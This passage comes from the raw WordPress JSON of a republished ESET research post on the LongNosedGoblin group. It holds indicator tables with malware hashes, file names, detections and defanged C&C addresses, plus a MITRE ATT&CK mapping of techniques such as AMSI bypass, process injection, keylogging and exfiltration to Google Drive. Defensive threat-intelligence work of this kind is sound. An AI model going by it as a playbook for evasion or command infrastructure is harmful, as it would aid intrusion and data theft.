209px;\"><span style=\"font-family: courier new, courier, monospace;\">161A25CB0B8FA998BF1B<wbr\/>DEE31F06F24876453CDF<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">AdobeHelper.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">WinGo\/ReverseShell.DX<\/td>\n<td style=\"width: 302.203px;\">ReverseSocks5.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">4D61A9FBBCC4F7A37BE2<wbr\/>1548B55BB5B9B837F83B<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">msi.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Agent.DOT<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 2.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">5AE440805719250AAEFE<wbr\/>E9B39DACD23D2FB573CD<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">TCOCertified.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Runner.BW<\/td>\n<td style=\"width: 302.203px;\">Argument runner.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">E93D32C739825519A10A<wbr\/>4C52C5F1EE33936E4FDB<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">WinGo\/PSW.Agent.FZ<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 4.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">212126896D38C1EE5732<wbr\/>0FB6940FED7A6E30D9EA<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGHB<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">CFFE15AA4D0F9E6577CC<wbr\/>B509ACE9C588937943F2<\/span><\/td>\n<td 
style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HPNDFInterface.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">6AC22CE60B706E3B9A79<wbr\/>27633116911E1087C0D4<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">bemsvc.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">2C1959DD85424CEDC96B<wbr\/>1BB86A95FCA440CB9E36<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HPDeviceCheck.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGWU<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">46107B1292B830D9BCEB<wbr\/>BDA6EEDB32FBC05707B4<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HP.OCF.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Patched.NLL<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">581464978C29B2BC79C6<wbr\/>5766E62011C94D2CBEAB<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HP.OCF.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Patched.NLL<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, 
monospace;\">0D91A0E52212EC44E32C<wbr\/>47F7760AF3B473B72798<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">ax_installer.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">48D715466857FB0C6CD0<wbr\/>249DE6D960FC199438E1<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">btdevmanager.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Keylogger<wbr\/>_AGen.DL<\/td>\n<td style=\"width: 302.203px;\">NosyLogger.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">563677CFACD328EA2478<wbr\/>836E58A8BD0DF11206A3<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">information.txt<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">AC2264C56121141DAF75<wbr\/>1A3852CD34F3ACB1D63C<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">ntrtscan.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">70A615BC580522E1EEE4<wbr\/>B61394DC7A247FE47022<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">ntrtscan.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span 
style=\"font-family: courier new, courier, monospace;\">E9C5E4AA335DFBD25786<wbr\/>234A58CE4C9C551D1A41<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">oci.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Kryptik_A<wbr\/>Gen.UW<\/td>\n<td style=\"width: 302.203px;\">Loader of unknown malware (probably Cobalt Strike).<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">EC9CEB599DF3BDFFAD53<wbr\/>6900D0E6D48E2E5FF12B<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">mscorsvc.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Kryptik.EHP<\/td>\n<td style=\"width: 302.203px;\">Loader of unknown malware (probably Cobalt Strike).<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"142\"><strong>IP<\/strong><\/td>\n<td width=\"190\"><strong>Domain<\/strong><\/td>\n<td width=\"104\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"71\"><strong>First seen<\/strong><\/td>\n<td width=\"113\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">118.107.234[.]26<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.sslvpn<wbr\/>server[.]com<\/span><\/td>\n<td width=\"104\">IRT\u2011IPSERVERONE\u2011MY<\/td>\n<td width=\"71\">2022\u201104\u201109<\/td>\n<td width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">103.159.132[.]30<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.thread<wbr\/>stub[.]com<\/span><\/td>\n<td width=\"104\">IRT-FBP-MY<\/td>\n<td width=\"71\">2023\u201110\u201103<\/td>\n<td 
width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">101.99.88[.]113<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.blaze<wbr\/>newso[.]com<\/span><\/td>\n<td width=\"104\">Shinjiru Technology Sdn Bhd<\/td>\n<td width=\"71\">2024\u201108\u201123<\/td>\n<td width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">118.107.234[.]29<\/span><\/td>\n<td width=\"190\">N\/A<\/td>\n<td width=\"104\">IRT\u2011IPSERVERONE\u2011MY<\/td>\n<td width=\"71\">2023\u201103\u201120<\/td>\n<td width=\"113\">ReverseSocks5 server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">101.99.88[.]188<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.privacy<wbr\/>policy-my[.]com<\/span><\/td>\n<td width=\"104\">Shinjiru Technology Sdn Bhd administrator<\/td>\n<td width=\"71\">2024\u201110\u201123<\/td>\n<td width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">38.54.17[.]131<\/span><\/td>\n<td width=\"190\">N\/A<\/td>\n<td width=\"104\">Kaopu Cloud HK Limited<\/td>\n<td width=\"71\">2025\u201103\u201105<\/td>\n<td width=\"113\">Server hosting malware, probably Cobalt Strike.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 18<\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td 
width=\"151\"><strong>Name<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1585\/003\/\">T1585.003<\/a><\/td>\n<td width=\"151\">Establish Accounts: Cloud Accounts<\/td>\n<td width=\"265\">LongNosedGoblin created accounts on cloud-based services for C&amp;C communication.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1588\/001\/\">T1588.001<\/a><\/td>\n<td width=\"151\">Obtain Capabilities: Malware<\/td>\n<td width=\"265\">LongNosedGoblin likely used shared malware that we named NosyDoor.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">NosyDownloader executes PowerShell commands.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: Windows Command Shell<\/td>\n<td width=\"265\">NosyDoor may execute commands via <span style=\"font-family: courier new, courier, monospace;\">cmd.exe<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1106\/\">T1106<\/a><\/td>\n<td width=\"151\">Native API<\/td>\n<td width=\"265\">NosyStealer Stage 1 executes the next stage via the <span style=\"font-family: courier new, courier, monospace;\">LoadLibraryW<\/span> API.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" 
width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1053\/005\">T1053.005<\/a><\/td>\n<td width=\"151\">Scheduled Task\/Job: Scheduled Task<\/td>\n<td width=\"265\">NosyDoor and NosyStealer are persisted using Windows scheduled tasks.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1574\/014\">T1574.014<\/a><\/td>\n<td width=\"151\">Hijack Execution Flow: AppDomainManager<\/td>\n<td width=\"265\">NosyDoor Stage 2 uses AppDomainManager injection to run malicious code.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"10\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1027\/013\/\">T1027.013<\/a><\/td>\n<td width=\"151\">Obfuscated Files or Information: Encrypted\/Encoded File<\/td>\n<td width=\"265\">Malicious files embedded in NosyDoor Stage 1 are encrypted via DES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/015\/\">T1027.015<\/a><\/td>\n<td width=\"151\">Obfuscated Files or Information: Compression<\/td>\n<td width=\"265\">NosyDownloader Stage 4 is compressed using gzip.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1622\">T1622<\/a><\/td>\n<td width=\"151\">Debugger Evasion<\/td>\n<td width=\"265\">NosyLogger doesn&#8217;t operate if a debugger is present.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1480\">T1480<\/a><\/td>\n<td width=\"151\">Execution Guardrails<\/td>\n<td width=\"265\">Some samples of NosyDoor operate only on 
machines with specific names.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1564\/003\">T1564.003<\/a><\/td>\n<td width=\"151\">Hide Artifacts: Hidden Window<\/td>\n<td width=\"265\">NosyDownloader creates a PowerShell process with a hidden window.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1562\/001\">T1562.001<\/a><\/td>\n<td width=\"151\">Impair Defenses: Disable or Modify Tools<\/td>\n<td width=\"265\">NosyDoor Stage 2, NosyStealer Stage 3, and NosyDownloader bypass AMSI.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1036\/005\">T1036.005<\/a><\/td>\n<td width=\"151\">Masquerading: Match Legitimate Name or Location<\/td>\n<td width=\"265\">NosyHistorian Stage 1 was observed with the name <span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span>, masquerading as a Registry Policy file.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1218\">T1218<\/a><\/td>\n<td width=\"151\">Signed Binary Proxy Execution<\/td>\n<td width=\"265\">NosyDoor Stage 1 executes the next stage by leveraging the legitimate <span style=\"font-family: courier new, courier, monospace;\">UevAppMonitor.exe<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1055\">T1055<\/a><\/td>\n<td width=\"151\">Process Injection<\/td>\n<td width=\"265\">One observed NosyStealer Stage 2 injects Stage 3 into <span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span> via <span style=\"font-family: courier new, courier, monospace;\">CreateRemoteThread<\/span>. 
The other observed sample injects into <span style=\"font-family: courier new, courier, monospace;\">notepad.exe<\/span> via <span style=\"font-family: courier new, courier, monospace;\">SetThreadContext<\/span> with <span style=\"font-family: courier new, courier, monospace;\">ResumeThread<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1620\">T1620<\/a><\/td>\n<td width=\"151\">Reflective Code Loading<\/td>\n<td width=\"265\"><a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/software\/S0695\/\">Donut<\/a> has been used to execute NosyStealer Stage 3 and Stage 4 in memory.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1217\">T1217<\/a><\/td>\n<td width=\"151\">Browser Information Discovery<\/td>\n<td width=\"265\">NosyHistorian collects browser history from Google Chrome, Microsoft Edge, and Mozilla Firefox.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1083\">T1083<\/a><\/td>\n<td width=\"151\">File and Directory Discovery<\/td>\n<td width=\"265\">NosyDoor can list files and directories.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1082\">T1082<\/a><\/td>\n<td width=\"151\">System Information Discovery<\/td>\n<td width=\"265\">NosyDoor obtains system information as part of C&amp;C beaconing.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Collection<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1056\/001\">T1056.001<\/a><\/td>\n<td 
width=\"151\">Input Capture: Keylogging<\/td>\n<td width=\"265\">NosyLogger logs keystrokes.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1125\">T1125<\/a><\/td>\n<td width=\"151\">Video Capture<\/td>\n<td width=\"265\">LongNosedGoblin has used video recording software, likely FFmpeg, to capture audio and video.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1560\/\">T1560<\/a><\/td>\n<td width=\"151\">Archive Collected Data<\/td>\n<td width=\"265\">NosyLogger encrypts collected data via AES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1074\/001\/\">T1074.001<\/a><\/td>\n<td width=\"151\">Data Staged: Local Data Staging<\/td>\n<td width=\"265\">NosyLogger stores pressed keys, window names, and clipboard content in a file at a hardcoded path.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\" width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1071\/001\">T1071.001<\/a><\/td>\n<td width=\"151\">Application Layer Protocol: Web Protocols<\/td>\n<td width=\"265\">NosyDownloader uses HTTP to download further payloads.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1105\/\">T1105<\/a><\/td>\n<td width=\"151\">Ingress Tool Transfer<\/td>\n<td width=\"265\">NosyDoor and NosyDownloader can download and run subsequent payloads.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1102\/002\">T1102.002<\/a><\/td>\n<td width=\"151\">Web Service: 
Bidirectional Communication<\/td>\n<td width=\"265\">NosyDoor uses Microsoft OneDrive as its C&amp;C server. NosyStealer uses Google Docs to receive a trigger command and to send debug messages, and Google Drive to exfiltrate browser data.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1573\/001\/\">T1573.001<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Symmetric Cryptography<\/td>\n<td width=\"265\">NosyDoor encrypts C&amp;C command outputs via AES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1573\/002\/\">T1573.002<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Asymmetric Cryptography<\/td>\n<td width=\"265\">NosyDoor uses RSA to encrypt metadata that&#8217;s sent to the C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Exfiltration<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1567\/002\">T1567.002<\/a><\/td>\n<td width=\"151\">Exfiltration Over Web Service: Exfiltration to Cloud Storage<\/td>\n<td width=\"265\">NosyStealer exfiltrates browser data to Google Drive.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>In 2024, ESET researchers spotted previously undocumented malware 
in the network of a Southeast Asian governmental entity. This led us to uncover even more new malware on the same system, none of which had substantial ties to any previously tracked threat actors. Based on our findings, we decided to attribute the malicious tools to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9980,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[7045,6465,7044,2691,7042,7043,6907],"class_list":["post-9978","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-affairs","tag-asia","tag-governmental","tag-japan","tag-longnosedgoblin","tag-sniff","tag-southeast"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/9978","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9978"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/9978\/revisions"}],"predecessor-version":[{"id":9979,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/9978\/revisions\/9979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/9980"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9978"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9978"},{"taxonomy":"post_tag","emb
eddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9978"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}